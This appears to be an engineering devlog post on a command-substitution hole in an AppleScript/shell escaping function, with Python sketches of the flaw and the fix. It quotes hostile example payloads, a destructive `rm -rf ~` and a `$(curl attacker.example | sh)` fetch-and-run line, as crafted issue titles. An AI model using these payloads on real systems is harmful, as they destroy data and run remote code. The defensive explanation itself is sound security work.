The backtick that could run anything: hardening AppleScript shell escaping

The finding read: “shell command-substitution gap in _escape_for_applescript_literal — backtick and $ were unescaped inside the do script double-quoted string, allowing arbitrary command execution via crafted issue titles.”

That sentence works quietly. The function name implies it escapes things, the double-quoted string implies containment, and the input (a GitHub issue title) implies human text. None of those implications were wrong, exactly. They were just incomplete in precisely the way that matters for security. The Sprint 2.11 review found the gap; it had been sitting in the pipeline since at least Sprint 2.9.

What the function does

The editorial pipeline’s automation executes shell commands via AppleScript. The pattern is roughly: a Python layer assembles a shell command string, passes it to an AppleScript do script call, and AppleScript hands it to the terminal. For that to work safely, anything that comes from outside the system (an issue title, a branch name, a label) has to be sanitised before it lands inside the AppleScript string literal.
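A minimal sketch of that hand-off, to make the layers concrete. The function name build_osascript_argv is hypothetical, and the use of osascript with Terminal's do script is an assumption about how such a pipeline might be wired, not a copy of the actual code. Nothing is executed here; the sketch only builds the argument list.

```python
def build_osascript_argv(shell_command: str) -> list[str]:
    """Wrap a shell command in an AppleScript `do script` call.

    Hypothetical helper. It assumes shell_command is already safe to embed
    in an AppleScript string literal, which is only true for trusted,
    constant commands such as the one below.
    """
    script = f'tell application "Terminal" to do script "{shell_command}"'
    # osascript -e <script> runs a one-line AppleScript on macOS.
    return ["osascript", "-e", script]


argv = build_osascript_argv("git status")
print(argv[2])
```

The interesting part is what happens when shell_command stops being a constant and starts carrying text from outside the system.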

_escape_for_applescript_literal was the function that was supposed to do that. It existed. It had a name that described its job. That is the point where a lot of code reviews stop looking.

The Sprint 2.11 review did not stop there.

The gap

Inside a double-quoted string in a shell command, a few characters stay live. The two that matter here are the backtick ` (legacy command substitution) and the dollar sign $ (variable expansion and POSIX $() command substitution). Double quotes do not suppress those. They suppress word-splitting and glob expansion, but not substitution. Only single quotes or a backslash prefix make these characters literal.
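The quoting behaviour is easy to confirm against a real shell. The sketch below assumes a POSIX sh is available on the PATH; run_in_sh is a hypothetical helper, and the echoed words are harmless stand-ins for a payload.

```python
import subprocess


def run_in_sh(command: str) -> str:
    """Run a command line through POSIX sh and return its stdout."""
    result = subprocess.run(
        ["sh", "-c", command], capture_output=True, text=True, check=True
    )
    return result.stdout.rstrip("\n")


# Double quotes: both substitution forms still run.
double_quoted = run_in_sh('echo "$(echo modern) and `echo legacy`"')

# Single quotes: everything inside is literal.
single_quoted = run_in_sh("echo '$(echo modern) and `echo legacy`'")

# Double quotes with backslash prefixes: literal again.
escaped = run_in_sh('echo "\\$(echo modern) and \\`echo legacy\\`"')

print(double_quoted)
print(single_quoted)
print(escaped)
```

The first call prints the results of the inner commands; the other two print the text unchanged.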

_escape_for_applescript_literal was escaping characters that break the AppleScript string layer: backslashes, double quotes, the obvious ones. What it was not doing was escaping backticks or dollar signs. Those passed through clean into the do script double-quoted string. The shell then evaluated them.

The exploit surface was wherever user-controlled text reached the function. In this pipeline, the most direct path was a GitHub issue title. If an issue title contained something like `rm -rf ~` or $(curl attacker.example | sh), and that title was interpolated into a shell command via _escape_for_applescript_literal, the shell would execute it when AppleScript handed the string off. Not hypothetically. Literally.
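To illustrate, here is a hypothetical reconstruction of an escaper that handles only the AppleScript layer. It is not the pipeline's actual code, and the name escape_applescript_only is invented for the sketch. The sample titles reuse the payloads above and are never executed.

```python
def escape_applescript_only(text: str) -> str:
    """Hypothetical pre-fix behaviour: covers the AppleScript layer only."""
    # Backslash first, so the backslashes added for quotes are not doubled.
    return text.replace("\\", "\\\\").replace('"', '\\"')


titles = [
    "Fix typo in `rm -rf ~` docs",
    "Broken build $(curl attacker.example | sh)",
]
for title in titles:
    escaped = escape_applescript_only(title)
    # Neither title contains a quote or a backslash, so nothing changes:
    # the backticks and the $( ) reach the shell exactly as written.
    assert escaped == title
```

Every assertion passes, which is the problem: from the AppleScript layer's point of view there was nothing to escape.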

The function was named correctly. It was scoped incorrectly. It knew about the AppleScript escaping problem and missed the shell escaping problem one layer down.

Why this took three sprints to surface

The findings from 2.9 and 2.10 were not small. Sprint 2.10’s MEDIUM findings included removing an intermediate conn.commit() in _apply_merged and _apply_closed_unmerged so that mark_status committed atomically — a real bug, the kind that produces duplicate run.succeeded SSE events on crash. Sprint 2.9 dealt with audit-trail gaps: force=true fires were not writing run.forced events to pipeline_events, and BEGIN IMMEDIATE failures were swallowing the actual error. Those were the reviews that had reviewers’ attention.

The escaping function presumably passed because it existed and its name was accurate. It read as a utility, not a security surface. The Sprint 2.10 LOW findings that shipped on 2026-05-17 were described as “cosmetic or defensive hardening” — spurious conn.commit() removal, stderr logging gaps. Correct and useful, but not the kind of review that prompts you to ask “what characters does this function not handle?”

Sprint 2.11 did ask that question. The answer was backtick and $.

The fix

The fix is not complicated. Before interpolating user-controlled text into a shell command string, escape the characters that retain special meaning inside double quotes. The backtick gets a backslash prefix; so does the dollar sign. Those two additions close the command-substitution path.
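One way to sketch the two layers explicitly is shown below. This is an illustration under stated assumptions, not the shipped four-line change: it assumes the title lands inside a shell double-quoted argument, that the whole command is then embedded in an AppleScript literal, and all three function names are hypothetical. It also escapes the backslash and double quote at the shell layer, because an unescaped backslash in the input could otherwise neutralise the backslash added in front of a $ or backtick.

```python
def escape_for_shell_double_quotes(text: str) -> str:
    """Make text literal inside a shell double-quoted string.

    Threat model: the result is evaluated by the shell, so backslash,
    double quote, dollar sign and backtick are all prefixed with a backslash.
    """
    # Backslash must come first, or the prefixes added below get doubled.
    for ch in ("\\", '"', "$", "`"):
        text = text.replace(ch, "\\" + ch)
    return text


def escape_for_applescript_literal(text: str) -> str:
    """Make text safe inside an AppleScript double-quoted string literal."""
    return text.replace("\\", "\\\\").replace('"', '\\"')


def build_do_script(title: str) -> str:
    # Layer 1: the title becomes one shell double-quoted argument.
    shell_command = f'echo "{escape_for_shell_double_quotes(title)}"'
    # Layer 2: the finished shell command becomes an AppleScript literal.
    literal = escape_for_applescript_literal(shell_command)
    return f'tell application "Terminal" to do script "{literal}"'


print(build_do_script("`rm -rf ~` $(id)"))
```

The sketch does not address newlines or other control characters, which would need their own handling before text is typed into a terminal.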

What makes it worth writing about is not the fix itself. It is the gap between the function’s name and its actual contract. _escape_for_applescript_literal describes one layer of the problem: making the string safe to embed in an AppleScript literal. It does not describe the second layer: making the string safe to evaluate as a shell command. Both layers exist. The function only knew about one of them.

This is a category of bug I have seen in several forms. The name signals completeness. The code delivers partial completeness. The gap between the two is invisible unless you ask: safe against what? The Sprint 2.11 reviewer asked that. The question is the skill; the fix is almost incidental once you have it.

The broader pattern in this pipeline

Looking back across the 2.9, 2.10, and 2.11 sprint reviews, the findings sort into two categories.

The first is atomicity and ordering: commits happening at the wrong point in a transaction, events firing before state is stable, failures swallowing their own error messages. The conn.commit() removals and the BEGIN IMMEDIATE logging fix are both in this category. The risk is data corruption or confusing operational behaviour under failure conditions.

The second is incomplete escaping: functions that handle one layer of a multi-layer encoding problem and silently pass through the layer they missed. The _escape_for_applescript_literal gap is the clearest example. Each layer has its own special characters (Python string, AppleScript literal, shell double-quoted string), and a function that handles one layer correctly gives a false sense of coverage for the others.

Both categories share a structural cause: the code was written at a layer of abstraction where the next layer down was invisible. With the transaction bugs, the Python layer was not tracking what SQLite considered atomic. With the escaping bug, the AppleScript layer was not tracking what the shell considered evaluable. Neither failure looks like carelessness from inside the layer where the code was written. Both look obvious from one layer down.

What I changed in how I review escaping functions

Three things, none of them new ideas, but worth stating as explicit checkpoints rather than intuitions.

Name the threat model in the function comment, not just the transformation. “Escapes a string for use in an AppleScript literal” is a transformation description. “Escapes a string for use in an AppleScript literal passed to do script; the resulting string will be evaluated by the shell, so backtick and $ are also escaped to prevent command substitution” is a threat model. The second version makes the second layer visible to the next person reading the function.

When a function name ends in a layer name (_for_applescript_literal, _for_html_attribute, _for_sql_identifier), ask whether the output passes through another layer. A literal passed to do script passes through the shell. An HTML attribute value passed through a template might pass through JavaScript. An SQL identifier passed to a database might still be evaluated in a context with its own injection surface. The layer named in the function is rarely the last layer.
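A practical way to ask that question is to test an escaper against the next layer itself rather than against its own expectations. The sketch below does this for the shell layer only, assuming a POSIX sh on the PATH; the helper names and sample strings are hypothetical, and the AppleScript layer would need an equivalent check on macOS.

```python
import subprocess


def escape_for_shell_double_quotes(text: str) -> str:
    """Prefix the characters that stay special inside shell double quotes."""
    for ch in ("\\", '"', "$", "`"):  # backslash first
        text = text.replace(ch, "\\" + ch)
    return text


def echo_through_sh(text: str) -> str:
    """Embed text in a double-quoted shell argument and return what sh saw."""
    command = 'printf "%s" "' + escape_for_shell_double_quotes(text) + '"'
    result = subprocess.run(
        ["sh", "-c", command], capture_output=True, text=True, check=True
    )
    return result.stdout


samples = [
    "plain title",
    "`echo pwned`",
    "$(echo pwned)",
    "$HOME",
    'say "hi"',
    "back\\slash",
]
for sample in samples:
    # Round trip: the shell must hand back exactly the text that went in.
    assert echo_through_sh(sample) == sample
```

If any character were still being evaluated, the round trip would return something other than the input and the assertion would fail.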

Treat user-controlled strings as the highest-risk input, however benign they look. GitHub issue titles are human-readable text. They feel safe. They are also strings where an attacker has direct write access. Any path from issue title to shell execution is a path worth hardening, even if the realistic attacker population is small. The effort of adding two character escapes is near zero. The effort of explaining a code execution incident is not.

Where this sits in the build

The fix shipped in the Sprint 2.11 review, documented in the devlog entry dated 2026-05-20. The roadmap discipline that formalised how these review findings get tracked (with docs/roadmap.md as the canonical example under the new convention) came four days later on 2026-05-24, as Wave 2 of the roadmap work that Wave 1 had scaffolded in PRs #15 and #1.

The escaping fix is a small entry in that log. Four lines changed. One function tightened. The finding would not make a CVE. The pattern it represents is one I now look for by name: a function whose name promises more coverage than its code delivers. The Sprint 2.11 reviewer named it first. This article is the receipt.
